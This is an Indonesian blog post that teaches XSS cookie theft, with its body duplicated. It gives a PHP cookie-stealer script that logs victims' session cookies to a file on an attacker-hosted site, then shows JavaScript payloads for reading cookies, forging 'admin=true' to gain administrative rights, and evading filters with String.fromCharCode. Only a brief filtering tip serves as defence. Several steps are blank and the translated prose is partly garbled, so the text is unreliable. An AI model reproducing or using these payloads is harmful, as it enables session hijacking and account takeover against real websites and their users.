Postingan
Sebelomnya cek dolo tuh web bisa di injeksi pa ga caranya ada di step 2
Step 1
/*Ethernets Cookie Stealer */
/*Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("xssed.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
save => stealer.php
Step2
Untuk pengecekan apakah bisa di inject xss gunain javascriptnya
Step selanjutnya klo misalkan tuh web bisa di inveksi cz ada alert yg muncul krn step 2 gunian ni
Step 3
step 4
Nah buka xssed.txtnya deh
step 5
Cookie Manipulation:
Ni cuman contoh aja
Terkadang lo bakan melihat cookie yang terlihat seperti:
Admin=false;
Or
Logged_in=true;
Jangan binggung gunain javascriptnya
Javascript:alert(document.cookie);
Keterangan
Ini akan membuat sebuah kotak yang berisi peringatan
bahwa telah menerima. Untuk kepentingan ini demonstrasi, mari kita
katakan cookie terlihat seperti ini
Logged_in=true, admin=false, fusionid=12312313
Jadi, satu-satunya bagian yang sangat penting bagi qt adalah “admin = false”, sisanya adalah non-sense bahwa kita tidak perlu khawatir tentang. Tentunya, lo mungkin menemukan wont terlalu banyak situs web , tapi ini hanya dimaksudkan untuk memberikan dasar-dasar cara this.Obviously, kita dapat melihat bahwa jika kita ajukan ke cookie “admin = true” kita akan memiliki hak administratif. Dengan ini berikutnya sederhana JavaScript injeksi qt dapat mengubah cookienya menjadi.
Javascript:void(document.cookie=“admin=true”);
js di atas a/ hak administratif
Perlindungan:
“Jangan pernah percaya masukan pengguna dan selalu metakarakter penyaring”. Anda dapat menyaring JS atau HTML encode js. Pengalaman sebagai pengguna selalu mencoba untuk menghindari pergi ke luar adalah setiap link yang terhubung ke host lain. Hal ini dapat memecahkan 90% dari masalah terjangkitnya xss di web lo
Agar xss lo aman dr ripper bisa gunain string char code
dapat di inject degan js
/";alert(String.fromCharCode(88,83,83))
translate=>88,83,83 =>XSS
Credit
binushacker.net
Step 1
/*Ethernets Cookie Stealer */
/*Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("xssed.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
save => stealer.php
Step2
Untuk pengecekan apakah bisa di inject xss gunain javascriptnya
Step selanjutnya klo misalkan tuh web bisa di inveksi cz ada alert yg muncul krn step 2 gunian ni
Step 3
step 4
Nah buka xssed.txtnya deh
step 5
Cookie Manipulation:
Ni cuman contoh aja
Terkadang lo bakan melihat cookie yang terlihat seperti:
Admin=false;
Or
Logged_in=true;
Jangan binggung gunain javascriptnya
Javascript:alert(document.cookie);
Keterangan
Ini akan membuat sebuah kotak yang berisi peringatan
bahwa telah menerima. Untuk kepentingan ini demonstrasi, mari kita
katakan cookie terlihat seperti ini
Logged_in=true, admin=false, fusionid=12312313
Jadi, satu-satunya bagian yang sangat penting bagi qt adalah “admin = false”, sisanya adalah non-sense bahwa kita tidak perlu khawatir tentang. Tentunya, lo mungkin menemukan wont terlalu banyak situs web , tapi ini hanya dimaksudkan untuk memberikan dasar-dasar cara this.Obviously, kita dapat melihat bahwa jika kita ajukan ke cookie “admin = true” kita akan memiliki hak administratif. Dengan ini berikutnya sederhana JavaScript injeksi qt dapat mengubah cookienya menjadi.
Javascript:void(document.cookie=“admin=true”);
js di atas a/ hak administratif
Perlindungan:
“Jangan pernah percaya masukan pengguna dan selalu metakarakter penyaring”. Anda dapat menyaring JS atau HTML encode js. Pengalaman sebagai pengguna selalu mencoba untuk menghindari pergi ke luar adalah setiap link yang terhubung ke host lain. Hal ini dapat memecahkan 90% dari masalah terjangkitnya xss di web lo
Agar xss lo aman dr ripper bisa gunain string char code
dapat di inject degan js
/";alert(String.fromCharCode(88,83,83))
translate=>88,83,83 =>XSS
Credit
binushacker.net
Anda baru saja membaca artikel yang berkategori dengan judul Injeksi XSS Ke Dalam Website. Anda bisa bookmark halaman ini dengan URL http://blogku-duniaku.blogspot.com/2010/03/injeksi-xss-ke-dalam-website.html. Terima kasih!
Ditulis oleh:
zenonk - Kamis, 04 Maret 2010
Belum ada komentar untuk "Injeksi XSS Ke Dalam Website"
Posting Komentar